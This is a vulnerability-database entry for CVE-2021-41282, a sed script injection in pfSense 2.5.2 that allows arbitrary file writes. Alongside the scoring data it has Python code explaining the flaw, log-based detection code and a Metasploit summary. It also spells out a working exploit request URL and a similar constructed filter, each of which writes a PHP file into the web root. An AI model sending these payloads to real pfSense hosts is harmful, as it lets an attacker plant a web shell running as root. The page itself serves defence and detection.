CVE-2021-41282
Published 2022-03-01
Priority: P2 (78) · Severity: high · CVSS 3.1 base score: 8.8
Vector: AV:N / AC:L / PR:L / UI:N / S:U / C:H / I:H / A:H
Exploit: public exploit available
EPSS: 87.11% (99.7th percentile)
diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
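The mechanism in the description above, as an added example that is not pfSense's code: the exact sed expression diag_routes.php used is assumed (netstat output piped into `sed -e "1,3d; 5,$ { /FILTER/!d; };"`, with the user's filter placed in the sed address after escapeshellarg), `shlex.quote` stands in for PHP's escapeshellarg, and the PoC-style filter and the netstat output are constructed. The point it makes is that shell quoting only decides how the shell splits arguments; once the string reaches sed, every byte of it is sed script, single quotes included. The hardened `filter_routes` does the same filtering in-process with a strict alphabet so no user byte ever becomes part of a sed or shell script.

```python
"""
Why escapeshellarg() does not stop sed script injection (the CVE-2021-41282
pattern). Added example, not pfSense code: the pipeline shape is assumed from
the advisory text, and shlex.quote stands in for escapeshellarg.
"""
import re
import shlex

# Assumed shape of the vulnerable pipeline (braces doubled for str.format):
# drop the three banner lines, keep the column header on line 4, and from line 5
# on delete every route that does not match the user's filter.
VULN_TEMPLATE = '/usr/bin/netstat -rW | /usr/bin/sed -e "1,3d; 5,$ {{ /{filter}/!d; }};"'

# Constructed filter in the style of the public PoC: close the sed block early,
# rewrite the header line (which the template never deletes) into PHP, then `w`
# it to a path under the web root. The trailing newline + '#' turns whatever
# the template appends into a sed comment so the script still parses. The
# payload avoids quote characters; the public PoC does the same with \xNN escapes.
POC_FILTER = (".*/!d;};"
              "s/Destination/<?php phpinfo(); ?>/;"
              "w /usr/local/www/test.php\n#")

# Constructed netstat -rW output with the same layout sed is written against.
SAMPLE_NETSTAT = """\
Routing tables

Internet:
Destination        Gateway            Flags     Netif Expire
default            192.0.2.1          UGS         em0
127.0.0.1          link#2             UH          lo0
192.0.2.0/24       link#1             U           em0
"""

# Assumed allowlist: enough for IPv4/IPv6 addresses, CIDRs and interface names.
SAFE_FILTER = re.compile(r'[A-Za-z0-9.:/_-]*')


def build_command(user_filter: str) -> str:
    """Build the shell command the escapeshellarg-protected code would run."""
    return VULN_TEMPLATE.format(filter=shlex.quote(user_filter))


def sed_script(cmd: str) -> str:
    """Pull the sed script back out of the double-quoted -e argument."""
    return re.search(r'sed -e "(.*)"$', cmd, re.S).group(1)


def sed_write_targets(script: str) -> list:
    """Paths a sed script writes with the standalone w/W command. Shell quoting
    is irrelevant at this point: the shell already handed the whole string to
    sed, single quotes included. (The s///w flag form is not covered here.)"""
    return re.findall(r'(?:^|[;\n{}])\s*[wW]\s+(\S+)', script)


def filter_routes(netstat_output: str, user_filter: str) -> list:
    """Hardened equivalent of '1,3d; 5,$ { /f/!d; }' done in-process: validate
    the filter against a strict alphabet and match it as a literal substring."""
    if not SAFE_FILTER.fullmatch(user_filter):
        raise ValueError("filter contains characters outside the route-table alphabet")
    lines = netstat_output.splitlines()
    header, rows = lines[3], lines[4:]          # sed keeps line 4, filters 5..$
    return [header] + [r for r in rows if user_filter in r]


if __name__ == "__main__":
    script = sed_script(build_command(POC_FILTER))
    print(script)
    print("sed would write:", sed_write_targets(script))
    print("\n".join(filter_routes(SAMPLE_NETSTAT, "192.0.2")))
```

Running it prints the sed script that actually reaches the interpreter, with the quoted filter sitting inside it as a closed block, a substitution and a `w /usr/local/www/test.php` command; the hardened function rejects the same input outright.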
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pfsense | pfsense | <= 2.5.2 (per the Metasploit module below) | 2.6.0 CE / 22.01 Plus (per the Netgate release notes in the references) |
Detection & IOCs (extracted from sources)
Exploit request (URL):
`/diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23`
- Monitor HTTP GET requests to /diag_routes.php with an `isAjax=1` parameter and a `filter` value containing sed write commands (e.g. `;w+` or a newline encoded as `%0a`); this is the injection vector for the arbitrary file write.
- Detect web shell creation under /usr/local/www/ on pfSense hosts; the exploit writes a PHP web shell into this web root via sed injection.
- Alert on Shodan/FOFA-exposed pfSense login pages being targeted; attacker reconnaissance commonly uses `http.title:"pfsense - login"` to identify targets.
- The exploit requires authentication with the "WebCfg - Diagnostics: Routing tables" privilege; monitor for authenticated low-privilege users accessing /diag_routes.php followed by new PHP files appearing in /usr/local/www/.
- Look for a URL-encoded newline (`%0a`) followed by a comment character (`%23`) in the `filter` parameter of requests to diag_routes.php; the newline ends the injected sed commands and the `#` comments out the remainder of the original script.
- Exploitation requires an authenticated session; the attacker must first POST valid credentials to /index.php and obtain a CSRF token (matching the regex `sid:[a-z0-9,;:]+`) before the injection request can succeed.
- Standard escapeshellarg protections are in place but insufficient; the injection is sed-specific rather than a general shell command injection, so shell-level escaping does not prevent it.
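The indicators listed above, turned into detection logic that runs over access log lines, as an added example that is not pfSense's or any vendor's code. It assumes an nginx-style combined log format for the webConfigurator; the sample log lines and the allowlist of known pfSense pages are constructed for the example (the PoC line carries the same `filter` value as the exploit URL above). It flags the injection request itself and then, as the privilege note above suggests, any later request from the same client to a PHP page that is not a known pfSense page.

```python
"""
Detection logic for the CVE-2021-41282 indicators, run over access log lines.
Added example, not pfSense or vendor code. Assumes nginx-style combined log
format; sample lines and the page allowlist are constructed.
"""
import re
from urllib.parse import unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# sed constructs that have no place in a route-table filter
SED_WRITE_RE = re.compile(r'(?:^|[;\n{}])\s*[wW]\s+\S')          # standalone w/W file
SED_SUBST_WRITE_RE = re.compile(r's/[^/]*/[^/]*/[^;\n]*w\s+\S')  # s/../../w file flag
ROUTE_ALPHABET_RE = re.compile(r'[A-Za-z0-9.:/_ -]*')            # IPs, CIDRs, ifnames

# Constructed allowlist; a real deployment would enumerate /usr/local/www/*.php.
KNOWN_PAGES = {'/index.php', '/diag_routes.php', '/status_dashboard.php'}

# Constructed sample: a benign filter, the PoC request, the attacker fetching
# the file sed just wrote, and an unrelated client for contrast.
SAMPLE_LOG = r"""
198.51.100.7 - - [01/Mar/2022:10:12:03 +0000] "GET /diag_routes.php?isAjax=1&filter=192.0.2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Mar/2022:10:12:41 +0000] "GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x3c\x3fphp+var_dump(md5(\x27CVE-2021-41282\x27));unlink(__FILE__)\x3b\x3f\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1" 200 231 "-" "python-requests/2.27"
198.51.100.7 - - [01/Mar/2022:10:12:42 +0000] "GET /test.php HTTP/1.1" 200 60 "-" "python-requests/2.27"
203.0.113.9 - - [01/Mar/2022:10:13:00 +0000] "GET /status_dashboard.php HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""


def decode_filter(target: str):
    """Decoded 'filter' value of a diag_routes.php request target, else None."""
    parts = urlsplit(target)
    if parts.path != '/diag_routes.php':
        return None
    for pair in parts.query.split('&'):   # split on '&' only: the payload itself contains ';'
        key, _, value = pair.partition('=')
        if key == 'filter':
            return unquote_plus(value)    # '+' -> space, %0a -> newline, %23 -> '#'
    return None


def classify_filter(f: str) -> list:
    """Reasons a filter value looks like sed injection (empty list = benign)."""
    reasons = []
    if '\n' in f:
        reasons.append('embedded newline (%0a) terminates the injected script')
    if '}' in f:
        reasons.append('closes the sed block early')
    if SED_WRITE_RE.search(f) or SED_SUBST_WRITE_RE.search(f):
        reasons.append('sed write command')
    if not reasons and not ROUTE_ALPHABET_RE.fullmatch(f):
        reasons.append('characters outside the route-table alphabet')
    return reasons


def scan(log_text: str) -> list:
    """One pass over the log: flag injection attempts, then any later request
    from the same client to a PHP page that is not a known pfSense page."""
    alerts, tainted = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m['ip'], m['target']
        path = urlsplit(target).path
        f = decode_filter(target)
        if f is not None:
            reasons = classify_filter(f)
            if reasons:
                alerts.append({'ip': ip, 'ts': m['ts'], 'kind': 'sed-injection',
                               'filter': f, 'reasons': reasons})
                tainted.add(ip)
        elif ip in tainted and path.endswith('.php') and path not in KNOWN_PAGES:
            alerts.append({'ip': ip, 'ts': m['ts'],
                           'kind': 'possible-webshell-access', 'path': path})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The query string is split on `&` by hand rather than with `parse_qs` because older Python versions also split on `;`, which would cut the payload apart before the sed patterns could match. The alphabet check is deliberately last and only fires when nothing more specific did, so a filter such as `fe80::/64` or `em0` passes while anything carrying sed syntax does not.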
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| NVD | 2.0 | 9.0 | HIGH | AV:N/AC:L/Au:S/C:C/I:C/A:C |
(CVSS v2 has no Critical band; 9.0 is High on the v2 scale, which tops out at 10.0.)
No detection rules found.
Metasploit
pfSense Diag Routes Web Shell Upload (metasploit · CVSS 8.8 · HIGH)
This module exploits an arbitrary file creation vulnerability in the pfSense HTTP interface (CVE-2021-41282). The vulnerability affects versions <= 2.5.2 and can be exploited by an authenticated user if they have the "WebCfg - Diagnostics: Routing tables" privilege. This module uses the vulnerability to create a web shell and execute payloads with root privileges.
Nuclei
pfSense - Arbitrary File Write (nuclei · CVSS 8.8 · HIGH)
Template:
```yaml
id: CVE-2021-41282
info:
  name: pfSense - Arbitrary File Write
  author: cckuailong
  severity: high
  description: |
    diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes
```
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html
- https://docs.netgate.com/pfsense/en/latest/releases/22-01_2-6-0.html
- https://www.shielder.it/advisories/
- https://www.shielder.it/advisories/pfsense-remote-command-execution/